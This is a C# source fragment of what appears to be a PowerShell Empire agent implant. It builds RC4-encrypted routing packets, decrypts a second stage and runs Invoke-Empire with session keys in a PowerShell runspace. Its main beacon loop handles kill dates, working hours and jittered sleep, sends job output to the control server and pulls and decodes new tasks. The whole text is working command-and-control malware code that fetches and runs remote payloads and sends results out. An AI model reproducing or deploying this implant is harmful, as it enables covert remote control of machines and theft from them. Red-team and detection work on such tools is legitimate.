////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private byte[] NewRoutingPacket(byte[] encryptedBytes, int meta)
{
int encryptedBytesLength = 0;
if (encryptedBytes != null && encryptedBytes.Length > 0)
{
encryptedBytesLength = encryptedBytes.Length;
}
byte[] data = Encoding.ASCII.GetBytes(sessionInfo.GetAgentID());
byte lang = 0x03;
data = Misc.combine(data, new byte[4] {
lang, Convert.ToByte(meta), 0x00, 0x00
});
data = Misc.combine(data, BitConverter.GetBytes(encryptedBytesLength));
byte[] initializationVector = NewInitializationVector(4);
byte[] rc4Key = Misc.combine(initializationVector, sessionInfo.GetStagingKeyBytes());
byte[] routingPacketData = EmpireStager.rc4Encrypt(rc4Key, data);
routingPacketData = Misc.combine(initializationVector, routingPacketData);
if (encryptedBytes != null && encryptedBytes.Length > 0)
{
routingPacketData = Misc.combine(routingPacketData, encryptedBytes);
}
return(routingPacketData);
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private void PowershellEmpire(byte[] stage2Response)
{
string empire = Encoding.ASCII.GetString(aesDecrypt(sessionInfo.GetSessionKey(), stage2Response));
string execution = "Invoke-Empire";
execution += " -Servers \"" + sessionInfo.GetControlServers().First() + "\"";
execution += " -StagingKey \"" + sessionInfo.GetStagingKey() + "\"";
execution += " -SessionKey \"" + sessionInfo.GetSessionKey() + "\"";
execution += " -SessionID \"" + sessionInfo.GetAgentID() + "\"";
#if (PRINT)
Console.WriteLine(execution);
#endif
using (Runspace runspace = RunspaceFactory.CreateRunspace())
{
runspace.Open();
using (Pipeline pipeline = runspace.CreatePipeline())
{
pipeline.Commands.AddScript(empire + ";" + execution + ";");
pipeline.Invoke();
}
}
}
////////////////////////////////////////////////////////////////////////////////
// Main Loop
////////////////////////////////////////////////////////////////////////////////
private void Run()
{
////////////////////////////////////////////////////////////////////////////////
if (sessionInfo.GetKillDate().CompareTo(DateTime.Now) > 0 || coms.MissedCheckins > sessionInfo.GetDefaultLostLimit())
{
jobTracking.CheckAgentJobs(ref packets, ref coms);
if (packets.Length > 0)
{
coms.SendMessage(packets);
}
string message = "";
if (sessionInfo.GetKillDate().CompareTo(DateTime.Now) > 0)
{
message = "[!] Agent " + sessionInfo.GetAgentID() + " exiting: past killdate";
}
else
{
message = "[!] Agent " + sessionInfo.GetAgentID() + " exiting: Lost limit reached";
}
ushort result = 0;
coms.SendMessage(coms.EncodePacket(2, message, result));
Environment.Exit(1);
}
////////////////////////////////////////////////////////////////////////////////
if (null != sessionInfo.GetWorkingHoursStart() && null != sessionInfo.GetWorkingHoursEnd())
{
DateTime now = DateTime.Now;
if ((sessionInfo.GetWorkingHoursEnd() - sessionInfo.GetWorkingHoursStart()).Hours < 0)
{
sessionInfo.SetWorkingHoursStart(sessionInfo.GetWorkingHoursStart().AddDays(-1));
}
if (now.CompareTo(sessionInfo.GetWorkingHoursStart()) > 0 &&
now.CompareTo(sessionInfo.GetWorkingHoursEnd()) < 0)
{
TimeSpan sleep = sessionInfo.GetWorkingHoursStart().Subtract(now);
if (sleep.CompareTo(0) < 0)
{
sleep = (sessionInfo.GetWorkingHoursStart().AddDays(1) - now);
}
Thread.Sleep((int)sleep.TotalMilliseconds);
}
}
////////////////////////////////////////////////////////////////////////////////
if (0 != sessionInfo.GetDefaultDelay())
{
int max = (int)((sessionInfo.GetDefaultJitter() + 1) * sessionInfo.GetDefaultDelay());
if (max > int.MaxValue)
{
max = int.MaxValue - 1;
}
int min = (int)((sessionInfo.GetDefaultJitter() - 1) * sessionInfo.GetDefaultDelay());
if (min < 0)
{
min = 0;
}
int sleepTime;
if (min == max)
{
sleepTime = min;
}
else
{
Random random = new Random();
sleepTime = random.Next(min, max);
}
Thread.Sleep(sleepTime * 1000);
}
////////////////////////////////////////////////////////////////////////////////
byte[] jobResults = jobTracking.GetAgentJobsOutput(ref coms);
if (0 < jobResults.Length)
{
coms.SendMessage(jobResults);
}
////////////////////////////////////////////////////////////////////////////////
byte[] taskData = coms.GetTask();
if (taskData.Length > 0)
{
coms.MissedCheckins = 0;
if (String.Empty != Encoding.UTF8.GetString(taskData))
{
coms.DecodeRoutingPacket(taskData, ref jobTracking);
}
}
GC.Collect();
}